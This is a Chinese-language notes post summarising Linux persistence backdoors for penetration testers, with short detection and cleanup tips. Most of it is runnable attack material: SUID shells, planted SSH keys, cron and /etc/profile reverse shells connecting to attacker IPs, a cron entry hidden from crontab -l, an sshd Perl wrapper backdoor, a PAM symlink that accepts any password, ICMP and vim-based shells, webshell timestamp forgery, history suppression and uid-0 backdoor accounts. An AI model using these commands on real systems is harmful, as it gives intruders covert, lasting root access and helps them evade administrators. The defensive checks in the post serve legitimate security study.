Linux-权限维持小结

suid后门（需要root权限）：

SUID是Linux的一种权限机制，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限，那么就可以利用系统中的二进制文件和工具来进行root提权。
suid shell 是可以以shell所有者权限运行的shell
suid shell 是可以以shell所有者权限运行的shell
suid shell 是可以以shell所有者权限运行的shell
重要的事情说三遍！！！
必要条件（敲黑板，重点！)：

1、SUID权限仅对二进制程序有效。
2、执行者对于该程序需要具有x的可执行权限
3、本权限仅在执行该程序的过程中有效
4、在执行过程中执行者将具有该程序拥有者的权限

利用过程：

1. 首先通过root权限复制创建一个shell，然后设置成suid shell。

cp /bin/bash /tmp/.shell
chmod u+s /tmp/.shell

实现效果：通过普通用户登录，借助root权限执行命令

痕迹清理：

rm -rf /tmp/.shell

防御手段：查找具有suid权限的文件并删除它
下面的命令可以发现所有的系统中运行的SUID可执行文件：

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 

当然，上面的命令也可为攻击者所用，找到系统中运行的SUID可执行文件。
具体利用方法请参考：
对SUID可提权Root Shell的探究
suid后门（suid shell）

ssh利用公钥免密登录：

原理：攻击者将自己的 ssh 公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中，进而可以使用对应私钥直接使用 ssh 服务登录目标服务器

攻击机：任意有网卡的主机，能正常上网
目标机：有公网IP即可

攻击者想配置免密登录连接受害者
攻击机上执行：

ssh-keygen -b 4096 -t rsa

一路回车回车默认就行,在/root/.ssh/目录下生成了两个文件：
id_rsa、id_rsa.pub

然后将id_rsa.pub全部copy文件内容
复制到目标主机该文件中（如果原来存在内容就另起一行粘贴）：

/root/.ssh/authorized_keys

这里注意要在文件内容的前面和后面都加上 \n\n\n 换行符才行，否则会导致利用失败

攻击者利用公钥登录：

ssh -i /root/.ssh/id_rsa root@119.x.x.x

计划任务：

---

在Linux系统中，计划任务一般是由cron承担，我们可以把cron设置为开机时自动启动。cron启动后，它会读取它的所有配置文件（全局性配置文件/etc/crontab，以及每个用户的计划任务配置文件），然后cron会根据命令和执行时间来按时来调用工作任务
Cron 表达式生成网站：https://qqe2.com/cron

计划任务使用的是/bin/sh,直接通过bash反弹shell是行不通的（通过bash反弹仅适用于centos）

echo -e "*/1 * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.107.133\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"|crontab -

echo -e "*/1 * * * * perl -e 'use Socket;\$i=\"192.168.107.133\";\$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"|crontab -

# 适用于centos，本地测试失败
(crontab -l;echo '*/1 * * * * exec 9<> /dev/tcp/192.168.107.133/8888;exec 0<&9;exec 1>&9   2>&1;/bin/bash --noprofile -i')|crontab -

隐蔽用法：
下面命令执行后会显示"no crontab for root"。其实就达到了一个隐藏的效果，这时候管理员如果执行 crontab -l 就会看到显示"no crontab for root"

(crontab -l;printf "*/1 * * * * /bin/bash /home/b4yi/kali-6666.elf;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

cat 是看不到这个的，只能利用 less、vim 或者 cat -A 看到，这也是利用了cat的一个缺陷

本地测试结果：未能成功执行，没有反弹到msf上
这个坑留到以后再说

将反弹shell的命令写入/etc/profile文件：

---

将以下反弹shell的命写入/etc/profile文件中，/etc/profile中的内容会在用户打开bash窗口时执行

/bin/bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1

当目标主机管理员远程连接该主机时，就会执行该命令，成功获得目标机的shell

动态加载库：

---

linux操作系统的动态链接库在加载过程中，动态链接器会先读取LD_PRELOAD环境变量和默认配置文件/etc/ld.so.preload，并将读取到的动态链接库文件进行预加载，即使程序不依赖这些动态链接库，LD_PRELOAD环境变量和/etc/ld.so.preload配置文件中指定的动态链接库依然会被装载,因为它们的优先级比LD_LIBRARY_PATH环境变量所定义的链接库查找路径的文件优先级要高，所以能够提前于用户调用的动态库载入。这种后门推荐使用静态编译的ls、ps等命令或者busybox进行查找。

利用手段：

export LD_PRELOAD=./xx.so
#这时候./xx.so中如果对函数进行了重定义，调用了该函数的程序就会执行重定义的代码

检测手段：

echo $LD_PRELOAD
#默认无输出，如果有输出就需要去看下文件是否为异常文件了

清除手段：

unset LD_PRELOAD
#使用命令unset LD_PRELOAD即可卸载使用LD_PRELOAD环境变量安装的恶意动态链接库

这里使用以下项目：
https://github.com/Screetsec/Vegile

1、将MSF木马-shell和Vegile上传到目标服务器上
2、chmod 777 Vegile shell
3、./Vegile --u shell

清理起来十分麻烦，因为直接删除进程是删不掉的，因此存在父进程与多个子进程。
清除思路：挂起父进程，清除所有子进程再删除父进程

wrapper后门(需要root权限）:

init首先启动的是/usr/sbin/sshd,脚本执行到getpeername这里的时候，正则匹配会失败，于是执行下一句，启动/usr/bin/sshd，这是原始sshd。原始的sshd监听端口建立了tcp连接后，会fork一个子进程处理具体工作。这个子进程，没有什么检验，而是直接执行系统默认的位置的/usr/sbin/sshd，这样子控制权又回到脚本了。此时子进程标准输入输出已被重定向到套接字，getpeername能真的获取到客户端的TCP源端口，如果是19526就执行sh给个shell。

简单点就是从sshd fork出一个子进程，输入输出重定向到套接字，并对连过来的客户端端口进行了判断。
整个脚本在第二行执行了个if，如果端口符合要求，则直接建立连接，否则正常执行sshd。
LF代表开启的端口号是19526

#服务端执行:
cd /usr/sbin
mv sshd ../bin
echo '#!/usr/bin/perl' > sshd
echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..LF/);' >>sshd
echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/sshd restart
#客户端执行:
socat STDIO TCP4:target_ip:22,souceport=19526
#其中x00x00LF是19526的大端形式，便于传输和处理。如果你想修改源端口，可以用python的struct标准库实现
>>> import struct
>>> buffer = struct.pack('>I6',19526)
>>> print repr(buffer)
'\x00\x00LF'
>>> buffer = struct.pack('>I6',13377)
>>> print buffer
4A

优点:
1、隐蔽性较强,无需要编译,使用于大部分环境中.
2、在无连接后门的情况下,管理员是看不到端口和进程的,last也查不到登陆.
缺点:
1、需要重启sshd进程.

痕迹清理：

#删除自定义的sshd
rm -rf /usr/sbin/sshd
#将同版本的sshd拷贝到对应目录下
mv /usr/bin/sshd /usr/sbin/sshd

检测手段：

检查网络链接情况及文件
cat /usr/sbin/sshd

清除手段：

rm -rf /usr/sbin/sshd; mv /usr/bin/sshd ../sbin;

ssh软连接（需要root权限）：

ssh软连接后门原理：

1、Linux软连接ssh后门需要ssh配置允许PAM认证才能使用
2、将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su)
3、如果被控主机不允许root登陆可用其他已存在用户登陆

4、通过软连接的方式,实质上PAM认证是通过软连接的文件名(如:/tmp/su,/home/su)在/etc/pam.d/目录下寻找对应的PAM配置文件(如:/etc/pam.d/su)
5、任意密码登陆的核心是auth sufficient pam_rootok.so,只要PAM配置文件中包含此配置即可SSH任意密码登陆,，除了su中之外还有chsh、chfn同样可以。
步骤：

目标机器执行(任选其一）：
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345
ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oport=12345
ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oport=12345

Attacker执行：
ssh b4yi@目标ip -p 12345

检测手段：

1、查看可疑端口
netstat -antlp

netstat -antp | gerp -E "su|chfn|chsh"
#找到进程号xxx
ps aux | grep xxx
#找到软连接位置/aaa/bbb/su
kill xxx
rm -rf /aaa/bbb/su

2、查看可执行文件
ls -al /tmp/su

防御手段：

1、禁止PAM认证
vim /etc/ssh/sshd_config
UsePAM no
2、重载
/etc/init.d/sshd reload

说明：建立软连接到/usr/local/su 文件，也可以在其他目录，su文件名字不能变，变了就无法登录。当然可以通过其他设置，更改su名字也是可以的，然后启动，并指定监听12345端口，登录的时候密码随意即可。
具体原理参考：Linux的一个后门引发对PAM的探究
具体配置参考：Linux安全策略配置之PAM身份验证模块使用方法总结

协议后门：

在一些访问控制做的比较严格的环境中，由内到外的TCP流量会被阻断掉。但是对于UDP(DNS、ICMP)相关流量通常不会拦截。

ICMP（需要root权限）:

主要原理就是利用ICMP中可控的data字段进行数据传输。
具体原理请参考：小白必看！ICMP隐蔽隧道从入门到精通

ICMP后门项目地址：https://github.com/andreafabrizi/prism

使用此操作模式，后门静悄悄地在后台等待特定的 ICMP 数据包包含要连接回的主机/端口和防止第三方访问的私钥。

复现流程：
1、首先，运行netcat在攻击者的机器上等待从后门进来的连接：

nc -l -p 6666

2、编译prism.c，生成后门，即可执行文件prism

gcc -DDETACH -m32 -Wall -s -o prism prism.c

3、将生成的后门prism上传至目标服务器，并运行
4、客户端输入命令：

./sendPacket.py 受害者IP 密钥 客户端IP 客户端端口
比如：./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666

查看发送的ICMP数据包：

效果如图：

检测手段：

对应ICMP这种协议后门，直接查看网络连接即可，因为在使用过程中会产生大量的网络连接

VIM后门：

Vim是从 vi 发展出来的一个文本编辑器。代码补全，编译及错误跳转等方便编程的功能特别丰富,在程序员中被广泛使用，和Emacs并列成为类Unix系统用户最喜欢的文本编辑器。
使用条件：

1、安装了VIM编辑器
2、python扩展(绝大版本默认已安装)

首先使用一个python开启本地监听端口8888的脚本

from socket import *
import subprocess
import os, threading, sys, time
if __name__ == "__main__":
    server=socket(AF_INET,SOCK_STREAM)
    server.bind(('0.0.0.0',8888))
    server.listen(5)
    print 'waiting for connect'
    talk, addr = server.accept()
    print 'connect from',addr
    proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
           stdout=talk, stderr=talk, shell=True)

找到提供vim插件的python的扩展包目录

vim --version #查看使用的python版本

找到python的扩展位置

pip show requests

进入目录：

cd /usr/lib/python2.7/site-packages

将以上准备的py文件复制到此目录下
运行，并删除文件

$(nohup vim -E -c "pyfile shell.py"> /dev/null 2>&1 &) && sleep 2 && rm -f shell.py

清除痕迹

ps aux|grep vim
#获取pid
kill pid

检测手段：
由于是通过vim执行的，所以使用ps和netstat仍可以看到vim的相关进程

netstat -antlp | grep vim
more /proc/PID/cmdline
more /proc/PID/maps | grep python

本地环境复现失败了，就不放图了。。。先记着

隐藏文件：

Linux下创建一个隐藏文件：touch .test.txt
touch命令可以创建一个文件，文件名前面加一个点就代表是隐藏文件,如下图：

一般的Linux下的隐藏目录使用命令ls -l是查看不出来的，只能查看到文件及文件夹，查看Linux下的隐藏文件需要用到命令：ls -al
这里，我们可以看到在/tmp下，默认存在多个隐藏目录，这些目录是恶意文件常用来藏身的地方。如/temp/.ICE-unix/、/temp/.Test-unix/、/temp/.X11-unix/、/temp/.XIM-unix/

隐藏文件时间戳：
Unix 下藏后门必须要修改时间，否则很容易被发现，直接利用 touch 就可以了。
比如参考 index.php 的时间，再赋给 webshell.php，结果两个文件的时间就一样了。
利用方法：

touch -r index.php webshell.php
或者直接将时间戳修改成某年某月某日。如下 2014 年 01 月 02 日。
touch -t 1401021042.30 webshell.php

利用chattr修改文件属性：

在Linux中，使用chattr命令来防止root和其他管理用户误删除和修改重要文件及目录，此权限用ls -l是查看不出来的，从而达到隐藏权限的目的。

a：让文件或目录仅供附加用途。
b：不更新文件或目录的最后存取时间。
c：将文件或目录压缩后存放。
d：将文件或目录排除在倾倒操作之外。
i：不得任意更动文件或目录。
s：保密性删除文件或目录。
S：即时更新文件或目录。
u：预防意外删除。

chattr +i evil.php 锁定文件
lsattr evil.php 属性查看
chattr -i evil.php 解除锁定
rm -rf 1.evil.php 删除文件

隐藏历史操作命令

(Space)set +o history  #只针对你的工作关闭历史记录，临时禁用历史功能
(Space)set -o history  #恢复历史记录

注意set前面有个空格

添加普通用户：

# 创建一个用户名guest，密码123456的普通用户
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest

# useradd -p 方法  ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句
useradd -p "$(openssl passwd -1 123456)" guest
    
# chpasswd方法
useradd guest;echo 'guest:123456'|chpasswd
    
# echo -e方法
useradd test;echo -e "123456\n123456\n" |passwd test

添加root用户：

# 创建一个用户名guest，密码123456的root用户
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test

# 创建root权限用户，账号backdoor/123456
useradd -u 0 -o -g root -G root backdoor
echo 123456:password|chpasswd

#通过直接对etc/passwd文件进行写入
perl -e 'print crypt("123456", "AA"). "\n"' #首先用perl算一下123456加密后的结果
# 123456加密后的结果为AASwmzPNx.3sg
echo "backdoor:123456:0:0:me:/root:/bin/bash">>/etc/passwd  #直接写入etc/passwd中

清理痕迹：

userdel -f backdoor

可疑用户排查技巧：

# 查询特权用户特权用户(uid 为0)
[root@localhost ~]# awk -F: '$3==0{print $1}' /etc/passwd
# 查询可以远程登录的帐号信息，需要root权限
[root@localhost ~]# awk '/\$1|\$6/{print $1}' /etc/shadow
# 除root帐号外，其他帐号是否存在sudo权限。如非管理需要，普通帐号应删除sudo权限，需要root权限查看
[root@localhost ~]# more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"

参考如下：
ssh 软连接后门使用
渗透测试-权限维持
Linux、Windows权限维持常用后门学习总结
Linux常见的持久化后门汇总
[总结]Linux权限维持